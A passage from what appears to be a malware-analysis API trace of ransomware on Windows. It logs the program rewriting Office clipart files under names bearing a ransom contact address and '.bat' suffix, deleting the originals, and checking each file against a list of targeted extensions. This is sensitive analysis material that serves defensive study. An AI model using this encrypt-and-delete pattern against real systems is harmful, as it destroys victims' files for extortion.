lpNewFilePointer=0x0) returned 1 [0200.660] SetEndOfFile (hFile=0x3a0) returned 1 [0200.661] CloseHandle (hObject=0x3a0) returned 1 [0200.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.662] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf")) returned 1 [0200.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.663] lstrlenW (lpString=".doc") returned 4 [0200.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString=".docx") returned 5 [0200.663] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0200.663] lstrlenW (lpString=".pdf") returned 4 [0200.663] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString=".xls") returned 4 [0200.663] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.663] lstrlenW (lpString=".xlsx") returned 5 [0200.663] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0200.663] lstrlenW (lpString=".ppt") returned 4 [0200.663] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.663] lstrlenW (lpString=".zip") returned 4 [0200.663] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.663] lstrlenW (lpString=".rar") returned 4 [0200.663] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString=".bz2") returned 4 [0200.663] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString=".7z") returned 3 [0200.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.663] lstrlenW (lpString=".dbf") returned 4 [0200.663] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.663] lstrlenW (lpString=".1cd") returned 4 [0200.663] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF") returned 68 [0200.663] lstrlenW (lpString=".jpg") returned 4 [0200.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.664] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.664] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.710] GetLastError () returned 0x0 [0200.710] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x244a, lpOverlapped=0x0) returned 1 [0200.711] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x2450, lpOverlapped=0x0) returned 1 [0200.712] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0200.712] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0200.712] SetEndOfFile (hFile=0x374) returned 1 [0200.712] CloseHandle (hObject=0x374) returned 1 [0200.713] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.713] SetEndOfFile (hFile=0x3a0) returned 1 [0200.713] CloseHandle (hObject=0x3a0) returned 1 [0200.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf")) returned 1 [0200.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.714] lstrlenW (lpString=".doc") returned 4 [0200.714] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.714] lstrlenW (lpString=".docx") returned 5 [0200.714] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0200.714] lstrlenW (lpString=".pdf") returned 4 [0200.715] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString=".xls") returned 4 [0200.715] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.715] lstrlenW (lpString=".xlsx") returned 5 [0200.715] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0200.715] lstrlenW (lpString=".ppt") returned 4 [0200.715] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.715] lstrlenW (lpString=".zip") returned 4 [0200.715] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.715] lstrlenW (lpString=".rar") returned 4 [0200.715] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString=".bz2") returned 4 [0200.715] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString=".7z") returned 3 [0200.715] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.715] lstrlenW (lpString=".dbf") returned 4 [0200.715] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.715] lstrlenW (lpString=".1cd") returned 4 [0200.715] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF") returned 68 [0200.715] lstrlenW (lpString=".jpg") returned 4 [0200.715] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.716] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.716] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0200.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0200.717] GetLastError () returned 0x0 [0200.717] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x5474, lpOverlapped=0x0) returned 1 [0201.617] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5480, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5480, lpOverlapped=0x0) returned 1 [0201.618] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.618] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.618] SetEndOfFile (hFile=0x374) returned 1 [0201.619] CloseHandle (hObject=0x374) returned 1 [0201.619] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.619] SetEndOfFile (hFile=0x3a0) returned 1 [0201.620] CloseHandle (hObject=0x3a0) returned 1 [0201.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.620] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216153.jpg")) returned 1 [0201.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.621] lstrlenW (lpString=".doc") returned 4 [0201.621] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0201.621] lstrlenW (lpString=".docx") returned 5 [0201.621] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0201.621] lstrlenW (lpString=".pdf") returned 4 [0201.621] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0201.621] lstrlenW (lpString=".xls") returned 4 [0201.621] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0201.621] lstrlenW (lpString=".xlsx") returned 5 [0201.621] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0201.621] lstrlenW (lpString=".ppt") returned 4 [0201.621] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0201.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.621] lstrlenW (lpString=".zip") returned 4 [0201.621] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0201.621] lstrlenW (lpString=".rar") returned 4 [0201.621] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0201.621] lstrlenW (lpString=".bz2") returned 4 [0201.621] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0201.621] lstrlenW (lpString=".7z") returned 3 [0201.622] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0201.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.622] lstrlenW (lpString=".dbf") returned 4 [0201.622] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0201.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.622] lstrlenW (lpString=".1cd") returned 4 [0201.622] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0201.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216153.JPG") returned 68 [0201.622] lstrlenW (lpString=".jpg") returned 4 [0201.622] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0201.622] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.622] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0201.623] GetLastError () returned 0x0 [0201.623] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x60dc, lpOverlapped=0x0) returned 1 [0201.739] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x60e0, lpOverlapped=0x0) returned 1 [0201.740] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.740] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.740] SetEndOfFile (hFile=0x374) returned 1 [0201.741] CloseHandle (hObject=0x374) returned 1 [0201.741] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.741] SetEndOfFile (hFile=0x3a0) returned 1 [0201.742] CloseHandle (hObject=0x3a0) returned 1 [0201.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216570.wmf")) returned 1 [0201.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.743] lstrlenW (lpString=".doc") returned 4 [0201.743] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.743] lstrlenW (lpString=".docx") returned 5 [0201.743] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0201.743] lstrlenW (lpString=".pdf") returned 4 [0201.744] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString=".xls") returned 4 [0201.744] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.744] lstrlenW (lpString=".xlsx") returned 5 [0201.744] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0201.744] lstrlenW (lpString=".ppt") returned 4 [0201.744] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.744] lstrlenW (lpString=".zip") returned 4 [0201.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.744] lstrlenW (lpString=".rar") returned 4 [0201.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString=".bz2") returned 4 [0201.744] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString=".7z") returned 3 [0201.744] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.744] lstrlenW (lpString=".dbf") returned 4 [0201.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.744] lstrlenW (lpString=".1cd") returned 4 [0201.744] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216570.WMF") returned 68 [0201.744] lstrlenW (lpString=".jpg") returned 4 [0201.744] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.745] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.745] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0201.746] GetLastError () returned 0x0 [0201.746] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1ca8, lpOverlapped=0x0) returned 1 [0201.792] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1cb0, lpOverlapped=0x0) returned 1 [0201.794] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.794] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.794] SetEndOfFile (hFile=0x374) returned 1 [0201.794] CloseHandle (hObject=0x374) returned 1 [0201.794] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.794] SetEndOfFile (hFile=0x3a0) returned 1 [0201.797] CloseHandle (hObject=0x3a0) returned 1 [0201.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0217872.wmf")) returned 1 [0201.797] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString=".doc") returned 4 [0201.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString=".docx") returned 5 [0201.798] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0201.798] lstrlenW (lpString=".pdf") returned 4 [0201.798] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString=".xls") returned 4 [0201.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.798] lstrlenW (lpString=".xlsx") returned 5 [0201.798] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0201.798] lstrlenW (lpString=".ppt") returned 4 [0201.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString=".zip") returned 4 [0201.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.798] lstrlenW (lpString=".rar") returned 4 [0201.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString=".bz2") returned 4 [0201.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString=".7z") returned 3 [0201.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString=".dbf") returned 4 [0201.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString=".1cd") returned 4 [0201.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0217872.WMF") returned 68 [0201.798] lstrlenW (lpString=".jpg") returned 4 [0201.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.799] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.799] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0201.800] GetLastError () returned 0x0 [0201.800] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x65a6, lpOverlapped=0x0) returned 1 [0201.833] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x65b0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x65b0, lpOverlapped=0x0) returned 1 [0201.835] ReadFile (in: hFile=0x3a0, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0201.835] WriteFile (in: hFile=0x374, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0201.835] SetEndOfFile (hFile=0x374) returned 1 [0201.835] CloseHandle (hObject=0x374) returned 1 [0201.835] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0201.835] SetEndOfFile (hFile=0x3a0) returned 1 [0201.836] CloseHandle (hObject=0x3a0) returned 1 [0201.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228823.wmf")) returned 1 [0201.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.838] lstrlenW (lpString=".doc") returned 4 [0201.838] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString=".docx") returned 5 [0201.838] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0201.838] lstrlenW (lpString=".pdf") returned 4 [0201.838] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString=".xls") returned 4 [0201.838] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.838] lstrlenW (lpString=".xlsx") returned 5 [0201.838] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0201.838] lstrlenW (lpString=".ppt") returned 4 [0201.838] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228823.WMF") returned 68 [0201.838] lstrlenW (lpString=".zip") returned 4 [0201.838] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.838] lstrlenW (lpString=".rar") returned 4 [0201.838] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.838] lstrlenW (lpString=".bz2") returned 4 [0201.838] 